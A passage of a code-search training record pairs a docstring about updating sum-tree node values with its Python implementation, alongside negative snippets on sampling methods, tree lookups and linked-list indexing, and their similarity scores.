pd.DataFrame(data) \n svm = sns.lineplot(data=data, x=\"Sample size\", y=\"Area\", hue=\"Sampling method\", color=sns.set_palette(\"Set2\"))\n svm.set_title(f\"Convergence of the estimated area with increased sample size\")\n\n plt.xticks(rotation=45)\n plt.tight_layout()\n\n figure = svm.get_figure()\n figure.savefig(f'images/samplesize/StratifiedSsize{major[0]}-{major[-1]}.png')", "def sample_one(self):\n # x = self.mean + self.sigma * np.random.normal()\n x = self.dist.sample(1)\n return x", "def sampling(train_set, train_meta, klass, label, n_samples_pos, rate_neg, fold, path_idxs):\n\tprint('-- SAMPLING TRAINNING')\n\tdirectory_idxs = path_idxs+fold+'/'+str(int(klass))+'/'\n\tif(os.path.isdir(directory_idxs)):\n\t\tprint('loading indexes...')\n\t\tidxs_class_pos = np.loadtxt(directory_idxs+'idxs_pos_train.txt', dtype=int)\n\t\tidxs_class_neg = np.loadtxt(directory_idxs+'idxs_neg_train.txt', dtype=int)\n\telse:\n\t\tidxs_class_pos = (train_meta[ : , label] == klass).nonzero()[0]\n\t\tidxs_class_neg = (train_meta[ : , label] != klass).nonzero()[0]\n\t\tif(n_samples_pos < len(idxs_class_pos)):\n\t\t\tidxs_class_pos = np.random.choice(idxs_class_pos, n_samples_pos)\n\t\tidxs_class_neg = np.random.choice(idxs_class_neg, int(n_samples_pos*rate_neg))\n\t\tprint('saving indexes...')\n\t\tos.makedirs(directory_idxs)\n\t\tnp.savetxt(directory_idxs+'idxs_pos_train.txt', idxs_class_pos, fmt='%d')\n\t\tnp.savetxt(directory_idxs+'idxs_neg_train.txt', idxs_class_neg, fmt='%d')\n\n\ttrain_set = np.vstack((train_set[idxs_class_pos], train_set[idxs_class_neg]))\n\ttrain_meta = np.vstack((train_meta[idxs_class_pos], train_meta[idxs_class_neg]))\n\ttrain_meta[:, label] = 1\n\ttrain_meta[len(idxs_class_pos):, label] = -1\n\treturn [train_set, train_meta]", "def data_processing_for_stratified_sampling(data:pandas.core.frame.DataFrame, split_num:int) -> pandas.core.frame.DataFrame:\n win_data = data[data.label == 'W'] # Extract only the data of label of win\n draw_data = data[data.label == 'D'] # Extract only the data of label of draw\n lose_data = data[data.label == 'L'] # Extract only the data of label of lose\n data_list = [win_data, draw_data, lose_data]\n for i,wdl_data in enumerate(data_list):\n wdl_data = data_column_conversion(wdl_data)\n wdl_data = data_randomization(wdl_data)\n if i == 0:\n separated_data_list = data_separate(wdl_data, split_num)\n else:\n separated_data_list = data_list_wdl_merge(separated_data_list, data_separate(wdl_data, split_num))\n separated_data_list = assign_group_numbers_to_data(separated_data_list)\n integrated_data = data_list_put_together(separated_data_list)\n integrated_data = data_randomization(integrated_data)\n return integrated_data", "def test_node_sampling(weighted_graph_config_fixture):\n w_config = weighted_graph_config_fixture\n\n # Node 5 to node 4 has zero weight (zero transition probability)\n # Node 4 to node 5 has ten weight (high transition probability)\n edges = pd.DataFrame({'source_content_id': [0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5],\n 'destination_content_id': [5, 1, 0, 3, 4, 1, 2, 1, 3, 5, 3, 4],\n 'weight': [1, 2, 3, 4, 1, 2, 3, 4, 1, 10, 5, 0]}\n )\n wm = N2VModel()\n\n wm.create_graph(edges, w_config['weighted_graph'])\n\n wm.generate_walks(**w_config)\n\n wm.fit_model(**w_config, callbacks=EpochLogger())\n\n n_nodes = len(set(edges.source_content_id))\n n_transitions = n_nodes * (w_config['walk_length'] - 1) * w_config['num_walks']\n\n res = np.array([np.array(list(zip(x, x[1:]))).ravel() for x in wm.node2vec.walks])\n walks = np.reshape(res, (n_transitions, 2))\n\n pairs = pd.DataFrame({'state1': walks[:, 0], 'state2': walks[:, 1]})\n counts = pairs.groupby('state1')['state2'].value_counts().unstack()\n counts = counts.replace(np.nan, 0)\n assert pairs.shape == (n_nodes * (w_config['walk_length'] - 1) * w_config['num_walks'], 2)\n assert counts.iloc[5][4] == 0\n assert counts.iloc[4][5] != 0\n assert len(set(edges['source_content_id']).union(\n set(edges['destination_content_id']))) == len(wm.model.wv.vocab.keys())", "def generate_sampler(dataset, sampler_option='random', step=1):\n\n df = dataset.df\n min_age = np.min(df.age)\n max_age = np.max(df.age)\n\n if (max_age - min_age) % step == 0:\n max_age += step\n\n bins = np.arange(min_age, max_age, step)\n count = np.zeros(len(bins))\n for idx in df.index:\n age = df.loc[idx, \"age\"]\n key = np.argmax(np.logical_and(age - step < bins, age >= bins)).astype(int)\n count[key] += 1\n\n # weight_per_class = (1 / np.array(count)) if count.any() != 0 else 0.\n weight_per_class = np.zeros_like(count).astype(float)\n np.divide(1., count, out=weight_per_class, where=count != 0)\n weights = [0] * len(df)\n\n for idx, age in enumerate(df.age.values):\n key = np.argmax(np.logical_and(age - 5 <= bins, age > bins)).astype(int)\n weights[idx] = weight_per_class[key]\n\n weights = torch.FloatTensor(weights)\n\n if sampler_option == 'random':\n s = sampler.RandomSampler(dataset, replacement=False)\n elif sampler_option == 'weighted':\n s = sampler.WeightedRandomSampler(weights, len(weights))\n else:\n raise NotImplementedError(\"The option %s for sampler is not implemented\" % sampler_option)\n\n return s", "def sample(self, nsamples):\n return self.dist.sample(nsamples)", "def test_oss_sample_wt_fit():\n\n # Create the object\n oss = OneSidedSelection(random_state=RND_SEED)\n assert_raises(RuntimeError, oss.sample, X, Y)", "def draw_strat_sample(self, T, n, excl_idxs=None):\n\n if n == 0:\n return np.array([], dtype=np.uint)\n\n if T.size == n: # TODO: this only works if excl_idxs=None\n return np.arange(n)\n\n if n == 1:\n idxs_all_non_excl = np.setdiff1d(\n np.arange(T.size), excl_idxs, assume_unique=True\n )\n return np.array([np.random.choice(idxs_all_non_excl)])\n\n # Freedman-Diaconis rule\n h = 2 * np.subtract(*np.percentile(T, [75, 25])) / np.cbrt(n)\n n_bins = int(np.ceil((np.max(T) - np.min(T)) / h)) if h > 0 else 1\n n_bins = min(\n n_bins, n / 2\n ) # Limit number of bins to half of requested subset size.\n\n bins = np.linspace(np.min(T), np.max(T), n_bins, endpoint=False)\n idxs = np.digitize(T, bins)\n\n # Exclude restricted indices.\n if excl_idxs is not None and excl_idxs.size > 0:\n idxs[excl_idxs] = n_bins + 1 # Impossible bin.\n\n uniq_all, cnts_all = np.unique(idxs, return_counts=True)\n\n # Remove restricted bin.\n if excl_idxs is not None and excl_idxs.size > 0:\n excl_bin_idx = np.where(uniq_all == n_bins + 1)\n cnts_all = np.delete(cnts_all, excl_bin_idx)\n uniq_all = np.delete(uniq_all, excl_bin_idx)\n\n # Compute reduced bin counts.\n reduced_cnts = np.ceil(cnts_all / np.sum(cnts_all, dtype=float) * n).astype(int)\n reduced_cnts = np.minimum(\n reduced_cnts, cnts_all\n ) # limit reduced_cnts to what is available in cnts_all\n\n # Reduce/increase bin counts to desired total number of points.\n reduced_cnts_delta = n - np.sum(reduced_cnts)\n\n while np.abs(reduced_cnts_delta) > 0:\n\n # How many members can we remove from an arbitrary bucket, without any bucket with more than one member going to zero?\n max_bin_reduction = np.min(reduced_cnts[np.where(reduced_cnts > 1)]) - 1\n\n # Generate additional bin members to fill up/drain bucket counts of subset. This array contains (repeated) bucket IDs.\n outstanding = np.random.choice(\n uniq_all,\n min(max_bin_reduction, np.abs(reduced_cnts_delta)),\n p=(reduced_cnts - 1) / np.sum(reduced_cnts - 1, dtype=float),\n )\n uniq_outstanding, cnts_outstanding = np.unique(\n outstanding, return_counts=True\n ) # Aggregate bucket IDs.\n\n outstanding_bucket_idx = np.where(\n np.in1d(uniq_all, uniq_outstanding, assume_unique=True)\n )[\n 0\n ] # Bucket IDs to Idxs.\n reduced_cnts[outstanding_bucket_idx] += (\n np.sign(reduced_cnts_delta) * cnts_outstanding\n )\n reduced_cnts_delta = n - np.sum(reduced_cnts)\n\n # Draw examples for each bin.\n idxs_train = np.empty((0,), dtype=int)\n for uniq_idx, bin_cnt in zip(uniq_all, reduced_cnts):\n idx_in_bin_all = np.where(idxs.ravel() == uniq_idx)[0]\n idxs_train = np.append(\n idxs_train, np.random.choice(idx_in_bin_all, bin_cnt, replace=False)\n )\n return idxs_train", "def test_sampler():\n # SMC sampler with user defined L\n smc.generate_samples()\n\n # SMC sampler with approximately optimum L-kernel\n smc_opt.generate_samples()\n\n # Check estimates\n assert np.allclose(smc_opt.mean_estimate_EES[-1], p.mean, atol=0.1)\n assert np.allclose(smc_opt.var_estimate_EES[-1][0][0], p.cov[0][0],\n atol=0.2)\n assert np.allclose(smc_opt.var_estimate[-1][1][1], p.cov[1][1],\n atol=0.2)\n assert np.allclose(smc_opt.var_estimate[-1][0][1], p.cov[0][1],\n atol=0.2)\n\n # We'd expect that, on average, our SMC with optimum L-kernel should\n # maintain a higher effective sample size that our SMC sampler with a\n # 'user defined' kernel.\n\n assert np.mean(smc_opt.Neff) > np.mean(smc.Neff)", "def tree_query(self, pta_root):\n self.sul.pre()\n curr_node = pta_root\n\n inputs = []\n outputs = []\n\n while True:\n\n if curr_node.children:\n frequency_sum = sum(curr_node.input_frequencies.values())\n if frequency_sum == 0:\n # uniform sampling in case we have no information\n inp = choice(list(curr_node.children.keys()))\n else:\n # use float random rather than integers to be able to work with non-integer frequency information\n selection_value = random() * frequency_sum\n inp = None\n for i in curr_node.input_frequencies.keys():\n inp = i\n selection_value -= curr_node.input_frequencies[i]\n if selection_value <= 0:\n break\n # curr_node.input_frequencies[inp] -= 1\n\n inputs.append(inp)\n out = self.sul.step(inp)\n new_node = curr_node.get_child(inp, out)\n\n if new_node:\n outputs.append(out)\n curr_node = new_node\n else:\n self.sul.post()\n return\n else:\n curr_node = pta_root\n for i, o in zip(inputs, outputs):\n self.curr_node.input_frequencies[i] -= 1\n curr_node = curr_node.get_child(i, o)\n self.sul.post()\n return", "def costFun(self, S, x):", "def __call__(self, samples_number):\n self.sampler.sample(samples_number)", "def sampleWeight(self):\r\n x=random.random()\r\n i = 0\r\n n = len(self.weights)-1\r\n cummulativeWeight = 0\r\n #Distribute the exploration weight evenly among all the actions that have been\r\n #taken up to this point in time by any of the users\r\n if len(self.sampledActions) == 0:\r\n explorationWeight = 0\r\n else:\r\n explorationWeight = self.explorationFund / len(self.sampledActions)\r\n #Compute the normalization factor. If no action has been sampled by this user yet,\r\n #then each action k has weight eta*pi_k, where pi_k is the weight of k in the\r\n #prior distribution. Then, the normalization factor is the sum(eta*pi_k) for all k,\r\n #which is equal to eta*sum(pi_k), which is just eta, since the sum of the previous\r\n #weights has to add up to 1.\r\n #If one or more actions have been already sampled, the normalization factor is the\r\n #sum of 1) the weights already in self.weights, 2) the exploration fund, and 3) the\r\n #weights of the actions that are not yet in self.weights. Each one of these actions\r\n #has weight eta*pi_k (because it hasn't been sampled yet), so the total weight of the\r\n #mass of actions not yet in self.weights is eta*(1-sum(pi_l)), where the sum is over all\r\n #the weights already in self.weights\r\n if n < 0:\r\n normalizationFactor = self.priorBelief\r\n else:\r\n normalizationFactor = sum(self.weights) + self.explorationFund + \\\r\n self.priorBelief*(1-self.priorTopicDistr.cummulative[n])\r\n #Keep getting the next weight until the combined mass of the weights is less than the\r\n #random number x\r\n while True:\r\n w = self.__getitem__(i)\r\n if i in self.sampledActions:\r\n w += explorationWeight\r\n cummulativeWeight += w\r\n if x <= cummulativeWeight/normalizationFactor:\r\n if i not in self.sampledActions:\r\n self.sampledActions.append(i)\r\n return w\r\n i += 1", "def sample_tree(grid, edge_logits, edges, steps=1):\n logger.debug('sample_tree sampling a random spanning tree')\n COUNTERS.sample_tree_calls += 1\n if len(edges) <= 1:\n return edges\n tree = MutableTree(grid, edges)\n V, E, K = tree.VEK\n\n for step in range(steps):\n for e in range(E):\n e = np.random.randint(E) # Sequential scanning doesn't work.\n k1 = tree.remove_edge(e)\n valid_edges = np.where(\n tree.components[grid[1, :]] != tree.components[grid[2, :]])[0]\n valid_probs = edge_logits[valid_edges]\n valid_probs -= valid_probs.max()\n np.exp(valid_probs, out=valid_probs)\n total_prob = valid_probs.sum()\n if total_prob > 0:\n valid_probs *= 0.9999995 / total_prob # Avoid np.binom errors.\n k2 = valid_edges[sample_from_probs(valid_probs)]\n else:\n k2 = k1\n COUNTERS.sample_tree_infeasible += 1\n tree.add_edge(e, k2)\n\n COUNTERS.sample_tree_propose += 1\n COUNTERS.sample_tree_accept += (k1 != k2)\n HISTOGRAMS.sample_tree_log2_choices.update(\n [len(valid_edges).bit_length()])\n\n edges = sorted((grid[1, k], grid[2, k]) for k in tree.e2k.values())\n assert len(edges) == E\n return edges" ]
[ "0.5792323", "0.57242346", "0.5687577", "0.5676991", "0.56017643", "0.55336124", "0.54666936", "0.5430783", "0.53604496", "0.5358043", "0.530985", "0.5304589", "0.5277224", "0.5271483", "0.52695686", "0.5267166", "0.5261225", "0.52445275", "0.52442276", "0.5240669", "0.5205574", "0.5201676", "0.5198351", "0.51800835", "0.5164713", "0.51509655", "0.5133954", "0.512064", "0.510473", "0.5104595", "0.5101326", "0.5101326", "0.5082811", "0.50808877", "0.5076114", "0.5067781", "0.50436974", "0.50277203", "0.5004908", "0.5000121", "0.49991938", "0.4980979", "0.49800017", "0.49758017", "0.49701422", "0.496209", "0.49611577", "0.49559188", "0.4946537", "0.49401417", "0.49303448", "0.49279994", "0.49278066", "0.49194053", "0.4918245", "0.49167413", "0.49103525", "0.4903659", "0.49008116", "0.49005428", "0.48929334", "0.48898116", "0.48867616", "0.4885174", "0.48825604", "0.4881431", "0.48504594", "0.48432684", "0.48401403", "0.48348847", "0.48281515", "0.48227122", "0.4819628", "0.48162696", "0.48048115", "0.47972327", "0.47877783", "0.47872922", "0.47856593", "0.47815073", "0.47742954", "0.47663653", "0.47657764", "0.47655898", "0.47647786", "0.47647724", "0.47647172", "0.47607628", "0.47587818", "0.47530708", "0.47464043", "0.47410637", "0.47399023", "0.47393534", "0.47377068", "0.47217026", "0.47215486", "0.4721529", "0.4717488", "0.47172686" ]
0.76193213
0
Returns the value of the leaf node corresponding to the index.
def get(self, node_index): return self.nodes[node_index + self.low_idx]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get(self, index: int) -> int:\n node = self.get_node(index)\n if node:\n return node.val\n else:\n return -1", "def get_leaf(self, leaf_index):\n return self.__leaves_db.get(encode_int(leaf_index))", "def _value_at(self, index):\n node = self._get_node_at(index)\n if node is None:\n raise IndexError('List index out of range.')\n return node.value", "def _value_at(self, index):\n node = self._get_node_at(index)\n if node is None:\n raise IndexError('List index out of range.')\n return node.value", "def get(self, index):\n return self._get_node(index)", "def get_index(self, index):\n return self.get_node_from_index(index).data", "def value_at(self, index):\n if index==0:\n return self.head.val\n\n temp_node = self.head\n for _ in range(index):\n temp_node = temp_node.next\n return temp_node.val", "def get(self, index: Union[int, np.ndarray]) -> Union[float, np.ndarray]:\n tree_index = self.capacity + index\n return self._tree[tree_index]", "def __getitem__(self, index):\n node = self.head\n index += 1\n for level in reversed(range(self.max_levels)):\n while node.width[level] <= index:\n index -= node.width[level]\n node = node.next[level]\n return node.value", "def _get_node(self, index):\r\n\t\tself._validate_index(index)\r\n\t\treturn self._traverse(lambda i, list: i < index)[\"node\"]", "def value_at(self, index):\n if self.empty():\n return \"Linked List Empty\"\n\n idx = 1\n l = self.head\n while l.next is not None:\n if idx is index:\n break\n\n l = l.next\n idx += 1\n return l.data", "def get_value_by_index(self, index):\n return self['value'][index]", "def getNode(self, index):\n return self.nodes[index]", "def get(self, index=0):\n\n # Error case: Index out of acceptable range\n if index < 0 or index >= self._size:\n raise RangeError(\"index out of range.\")\n\n i = 0\n current_node = self._head\n\n while(i < index):\n current_node = current_node.next\n i += 1\n\n return current_node.value", "def getvalue(self, index):\n self._checkIndex(index)\n return self._items[index].value", "def get_node_value(self, n):\n node = self.get_node(n)\n if node:\n return node.value", "def value_for_index(self, index):\r\n return self[self.keyOrder[index]]", "def child(self, index):\n raise AttributeError, \"Cannot retrieve children from leaf nodes! Attempted on leaf:\\n\\n%s\" % self.prettyPrint()", "def __getitem__(self, index: int) -> T:\n node_at_index = self.__get_node_at_index(index)\n return node_at_index.item", "def get_leaf_index(self, leaf_hash):\n raw_index = self.__index_db.get(leaf_hash)\n if raw_index:\n return decode_int(raw_index)\n else:\n return -1", "def get(self, index):\n if index < 0 or index >= self.length:\n return -1\n curr = self.head\n for i in range(1, index + 1):\n curr = curr.next\n return curr.val", "def get_cell_value(self, index):\n x, y = index\n return self.grid[y][x]", "def get(self, index):\n if index < 0 or index >= self._size:\n return -1\n\n current = self._head\n for _ in range(index):\n current = current.next\n return current.val", "def get_by_index_key(self, index, key=str):\n return str(self.get(key, self.get_all_childname(key)[index]))", "def get(self, index):\n cur = self.head\n while cur and index>0:\n cur = cur.next\n index -= 1\n if cur:\n return cur.val\n else:\n return -1", "def get(self, index):\r\n if index >= self.length():\r\n print(\"ERROR\")\r\n return None\r\n current_index = 0\r\n current_node = self.head\r\n while True:\r\n current_node = current_node.next\r\n if current_index == index: return current_node.data\r\n current_index += 1", "def get(self, index: int) -> int:\n cnt = 0\n cur = self.head \n while cur != None:\n if(cnt == index):\n return cur.val\n cur = cur.next \n cnt += 1\n return -1", "def get(self, index):\n return self._node.attributes.get_public(index)", "def get(self, index):\n if index >= self.len:\n return -1\n p = self.head.next\n while index > 0:\n index -= 1\n p = p.next\n return p.val", "def read_index(self, index):\n current = self.head\n if index == 0:\n return current.data\n elif index >= self.size() :\n return None\n else:\n position = 0\n while position < index:\n current = current.next_node\n position += 1\n return current.data", "def get(self, index):\n if index < 0 or index >= self.size:\n return -1\n\n if self.head is None:\n return -1\n\n curr = self.head\n for i in range(index):\n curr = curr.next\n return curr.val", "def dist_from_root(self, index):\n if index == 0:\n return 0\n return self.dist_from_root(self.parent(index)) + 1", "def get_dna_value(self, index: int):\n return self.dna[index]", "def root_value(self):\n return self.__root.get_value()", "def get(self, index):\n\n return self.values[index]", "def unit_at(self, index):\n return self.child_at(index)", "def root_index(self):\n if self.is_binary_tree:\n return 0\n return -1", "def get_key(self, proxy_index):\n return self.treeItem(proxy_index)", "def get(self, index: int) -> int:\n if index < 0 or self.size <= index:\n return -1\n curr = self.head\n for _ in range(index + 1):\n curr = curr.next\n return curr.value", "def get(self, index):\n \n cur = self.head\n i = 0\n while i < index and cur:\n cur = cur.nxt\n i+=1\n# self.display(\"get , fetching the value at index \"+str(index)) \n if cur:\n print(\"found value %d\" %cur.val)\n return cur.val\n else:\n return -1", "def getWeightValue(self, index):\r\n\t\treturn None", "def findIndex(self, index):\n if(self._root != None):\n return self._findIndex(index, self._root)\n else:\n return None", "def FindLeafNode(self, node, index):\n if node.start > index or node.end() <= index:\n if self.debug:\n print node.ToPrettyString();\n print index;\n raise ValueError(\"Node don't contain index\");\n if node.start == index and node.level == 0: return node;\n if not node.children:\n raise ValueError(\"Didn't find the index\");\n for child in node.children:\n if child.start <= index and child.end() > index:\n return self.FindLeafNode(child, index);\n if self.debug:\n print node.ToPrettyString();\n print index;\n print \"node.start=%d\" % node.start;\n print \"node.end=%d\" % node.end();\n raise ValueError(\"Shouldn't reach the end\");", "def getNode_at(self, index):\n if self.empty():\n return \"Linked List Empty\"\n\n idx = 1\n l = self.head\n while l.next is not None:\n if idx is index:\n break\n\n l = l.next\n idx += 1\n return l", "def get_left_child(self, index):\n return self.heap[self.get_left_child_index(index)]", "def value(self):\n return self.node_value", "def index(self):\n return self._ll_tree.get_index()", "def get_value(self, entity, Pid, index):\n value = entity.data['claims'][Pid][index]['mainsnak']['datavalue']['value']\n return value", "def get_node(self, selector, index):\n\n self.arbor._setup_tree(self)\n self.arbor._grow_tree(self)\n indices = getattr(self, f\"_{selector}_field_indices\", None)\n if indices is None:\n raise RuntimeError(\"Bad selector.\")\n\n my_link = self.root._links[indices][index]\n return self.arbor._generate_tree_node(self.root, my_link)", "def get(self, subtree_sum):\n idx = 0\n while True:\n # if idx is a leaf node return the idx and the value\n if idx >= self.__capacity - 1:\n return (idx - self.__capacity + 1, self.__tree[idx])\n\n # else continue down\n left = 2 * idx + 1\n right = 2 * idx + 2\n left_sum = self.__tree[left]\n if left_sum >= subtree_sum:\n idx = left\n else:\n idx = right\n subtree_sum -= left_sum", "def value(self, index):\n\n return self._ax.value(index)", "def get(self, index: int) -> int:\n if index + 1 >self.cnt:\n return -1\n\n tmp = self.dummy\n for i in range(index+1):\n tmp = tmp.next\n return tmp.val", "def get_right_child(self, index):\n return self.heap[self.get_right_child_index(index)]", "def get_parent(self, index):\n return (index - 1) // (2)", "def get(self,root,key):\n node = root\n for digit in key:\n node = node.children[ord(digit)-ord('0')]\n if(node==None):\n return None\n return node.value.value", "def get(self, index):\n if 0 <= index <= len(self.nums):\n return self.nums[index]\n return -1", "def get(self, index: int) -> int:\n if index < 0 or index >= self.size: return -1\n \n # choose search from head or tail\n if index + 1 < self.size - index:\n ptr = self.head\n for _ in range(index + 1):\n ptr = ptr.next\n else: # from tail\n ptr = self.tail\n for _ in range(self.size - index):\n ptr = ptr.prev\n return ptr.val", "def get(self, index: int) -> int:\n curr = self.head\n count = 0\n if self.head is None:\n return -1\n if index == 0:\n return self.head.data\n while curr:\n if count == index:\n return curr.data\n count += 1\n curr = curr.next\n return -1", "def get(self, index):\n assert isinstance(index, np.ndarray)\n return self.weight[index]", "def __getitem__(self, key):\n if self._root:\n node = self._getItemHelper(key, self._root)\n if node:\n return node.value\n else:\n return None\n else:\n return None", "def left_child(self, index):\n return 2 * index + 1", "def get_parent(self, index):\n return self.heap[self.get_parent_index(index)]", "def __getitem__(self, index):\n return self._value_at(index)", "def __getitem__(self, index):\n return self._value_at(index)", "def left_child(self, index):\n return 2 * index", "def get_node(self, index: int) -> Optional[Node]:\r\n return self._nodes.get(index)", "def get_parent_index(index):\n if index == 0:\n return 0\n if index % 2 == 0:\n return int(index / 2 - 1)\n return int(index / 2)", "def right(self, index):\n try:\n if index == self.root_index():\n index = self.adjacency_list[index][1]\n else:\n index = self.adjacency_list[index][2]\n return index\n except IndexError:\n return -1", "def _GetSingleValue(self, node_idx, *attributes):\n raise NotImplementedError", "def _root(self, ind):\n while (ind != self._id[ind]):\n ind = self._id[ind]\n return ind", "def value(self):\n return self.get_attribute(\"value\", str(self.children))", "def left(self, index):\n try:\n if index == self.root_index():\n index = self.adjacency_list[index][0]\n else:\n index = self.adjacency_list[index][1]\n return index\n except IndexError:\n return -1", "def get(self, index):\n raise NotImplementedError() # pragma: no cover", "def item_at_index(self, index):\n if index < 0 or index >= self.size:\n return -1\n\n if self.head is None:\n return -1\n\n curr = self.head\n for i in range(index):\n curr = curr.next\n return curr.val", "def label_from_index(self, index):\n assert self.labels is not None, \"Labels not processed\"\n return self.labels[index]", "def get(self, index):\n count = 0\n x = self.begin\n\n while count != index:\n x = x.next\n count += 1\n\n return x.value", "def _parent(self, index):\r\n # Declaring the \"root\" its own parent, otherwise usual math\r\n return (index - 1) // 2 if index else 0", "def lookupVal(self, val):\n pybtlib.lookupVal.restype = ctypes.c_int\n pybtlib.lookupVal.argtypes = [ctypes.POINTER(Tree), ctypes.c_int]\n return pybtlib.lookupVal(ctypes.byref(self), val)", "def fromIndex(index):\n return Data.labels[index]", "def parent(self, index):\n return index / 2", "def node_index(self, key):\n return self._key_to_node_index[key]", "def GetSubkeyByIndex(self, index):", "def _get_node_at(self, index):\n assert isinstance(index, int) \n if index >= 0: \n steps = index \n else:\n steps = self.size() + index\n if steps < 0:\n return None \n node = self.head\n while steps > 0 and node is not None:\n node = node.next_node\n steps -= 1 \n return node", "def get_offset(self, index):\n if self.is_leaf():\n raise TerminalNodeException\n try:\n return self.offsets[index]\n except KeyError:\n return None", "def left_child_idx(idx):\n return (idx << 1) + 1", "def root(tree):\n\n return tree[0]", "def parent(self, index):\n if index == 0:\n return -1\n return self.adjacency_list[index][0]", "def __get_node_at_index(self, index: int) -> Node[T]:\n if 0 <= index and index < len(self):\n current = self.head\n for i in range(index):\n current = current.link\n return current\n else:\n raise ValueError(\"Index out of bounds\")", "def right_child(self, index):\n return 2 * index + 1", "def _get_node_at(self, index):\n assert isinstance(index, int)\n from_head = True if index >= 0 else False \n if from_head: \n node = self.head\n steps = index \n else:\n node = self.tail \n steps = abs(index) -1 \n while steps > 0 and node is not None:\n node = node.next_node if from_head else node.prev_node \n steps -= 1 \n return node", "def __getitem__(self, item: int) -> int:\n return self.root[item].key", "def max_child(self, index):\n # left and right child\n left = self._data[(index*2)+1] if (index*2)+1 < len(self) else None\n right = self._data[(index*2)+2] if (index*2)+2 < len(self) else None\n\n # if has both children\n if left and right:\n if left < right:\n return (index*2)+2\n return (index*2)+1\n\n # if only has left child\n elif left and right is None:\n return (index*2)+1\n\n # if only has right child\n elif right and left is None:\n return (index*2)+2\n\n # no children\n return None", "def draw_leaf_value(self, idx_data_points):\n R_j = self.get_residuals()[idx_data_points]\n draw = self.mean(R_j)\n return draw", "def getIndex(self, *args):\n return _libsbml.XMLNode_getIndex(self, *args)", "def select(self, index, source=None):\n if index > self.root.size_tree or index <= 0:\n raise IndexError(\"The index is out of range!\")\n\n check_node = self.root if not source else source\n\n while True:\n size_left_tree = check_node.left_child.size_tree\n if size_left_tree == index - 1:\n break\n elif size_left_tree >= index:\n check_node = check_node.left_child\n else:\n check_node = self.select(index - size_left_tree - 1, source=check_node.right_child)\n break\n\n return check_node", "def value(self, idx):\n item = self.items[idx]\n if item is None:\n ret = -float('inf')\n else:\n ret = self.fn(item)\n return ret", "def get_first(self) -> object:\n if self.root is None: # If tree is empty\n return None\n\n return self.root.value # Returning root value", "def select(self, index, source=None):\r\n if index > self.root.size_tree or index <= 0:\r\n raise IndexError(\"The index is out of range!\")\r\n\r\n check_node = self.root if not source else source\r\n\r\n while True:\r\n size_left_tree = check_node.left_child.size_tree\r\n if size_left_tree == index - 1:\r\n break\r\n elif size_left_tree >= index:\r\n check_node = check_node.left_child\r\n else:\r\n check_node = self.select(index - size_left_tree - 1, source=check_node.right_child)\r\n break\r\n\r\n return check_node", "def max_child(self, index):\n if self.empty():\n return None\n if self._has_left(index):\n left = self._left(index)\n large = left\n if self._has_right(index):\n right = self._right(index)\n if self._data[right] == self._data[left]:\n large = right\n if self._data[right] > self._data[left]:\n large = right\n return large\n return None", "def label(tree):\n return tree[0]" ]
[ "0.7675132", "0.75705653", "0.748514", "0.748514", "0.7377657", "0.7373278", "0.7160219", "0.7113328", "0.70526975", "0.7030114", "0.67928636", "0.66183364", "0.64346117", "0.6430315", "0.64223456", "0.641513", "0.63261515", "0.6309149", "0.62792677", "0.62526083", "0.62493974", "0.6237695", "0.6175561", "0.61753166", "0.6166387", "0.6154276", "0.6146972", "0.61346895", "0.61200714", "0.60988206", "0.6062117", "0.6055712", "0.6055579", "0.60377115", "0.60296136", "0.6028257", "0.6018229", "0.60091597", "0.5966537", "0.5957525", "0.5942483", "0.59392947", "0.5930703", "0.5927332", "0.5915626", "0.5912121", "0.5901098", "0.58950603", "0.5887997", "0.5882166", "0.5881767", "0.58619696", "0.58599573", "0.5859046", "0.585512", "0.5844044", "0.58418965", "0.5836339", "0.5827923", "0.58225924", "0.5815393", "0.5806067", "0.5803959", "0.5803959", "0.58010834", "0.57795817", "0.5775533", "0.57635444", "0.57592916", "0.5756667", "0.57522535", "0.5752135", "0.5751784", "0.5747761", "0.5737169", "0.5724976", "0.5716569", "0.5707117", "0.56895524", "0.5683614", "0.56826484", "0.56815416", "0.56805676", "0.5666986", "0.56539565", "0.56388414", "0.5627437", "0.5618474", "0.56173265", "0.56130105", "0.55980563", "0.558641", "0.558413", "0.55744934", "0.5573915", "0.5572044", "0.5568108", "0.55581033", "0.55470824", "0.5529908" ]
0.6483467
12
Sets the value of a leaf node and updates internal nodes accordingly. This operation takes O(log(capacity)).
def set(self, node_index, value): if value < 0.0: raise ValueError( 'Sum tree values should be nonnegative. Got {}'.format(value)) self.highest_set = max(node_index, self.highest_set) node_index = node_index + self.low_idx self.max_recorded_priority = max(value, self.max_recorded_priority) delta_value = value - self.nodes[node_index] # Now traverse back the tree, adjusting all sums along the way. for _ in reversed(range(self.depth)): # Note: Adding a delta leads to some tolerable numerical inaccuracies. self.nodes[node_index] += delta_value node_index = (node_index - 1) // 2 self.nodes[node_index] += delta_value assert node_index == 0, ('Sum tree traversal failed, final node index ' 'is not 0.')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_leaf_node(self, leaf_value):\n\n if not self.empty:\n try:\n node_key = self.node_key\n except AttributeError:\n node_key = '_'\n raise ValueError(\n 'Cannot modify a non-empty node. ' + \\\n 'If you meant to change type of node {}, '.format(node_key) + \\\n 'delete it first and then add an empty node with ' + \\\n 'the same key.')\n\n # check if leaf_value is a list-like object\n try:\n _ = iter(leaf_value)\n is_list = True\n except TypeError:\n is_list = False\n\n try:\n if is_list:\n leaf_value = [float(i) for i in leaf_value]\n else:\n leaf_value = float(leaf_value)\n except TypeError:\n raise TreeliteError('leaf_value parameter should be either a ' + \\\n 'single float or a list of floats')\n\n try:\n if is_list:\n _check_call(_LIB.TreeliteTreeBuilderSetLeafVectorNode(\n self.tree.handle,\n ctypes.c_int(self.node_key),\n c_array(ctypes.c_double, leaf_value),\n ctypes.c_size_t(len(leaf_value))))\n else:\n _check_call(_LIB.TreeliteTreeBuilderSetLeafNode(\n self.tree.handle,\n ctypes.c_int(self.node_key),\n ctypes.c_double(leaf_value)))\n self.empty = False\n except AttributeError:\n raise TreeliteError('This node has never been inserted into a tree; '\\\n + 'a node must be inserted before it can be a leaf node')", "def update(self, idx, value):\n idx = self.__capacity - 1 + idx\n self.__tree[idx] = value\n self.__update(idx)", "def update_recursive(self, leaf_value):\n # If it is not root, this node's parent should be updated first.\n if self._parent:\n self._parent.update_recursive(-leaf_value) # - leaf_value because the MCTS tree is a max-min 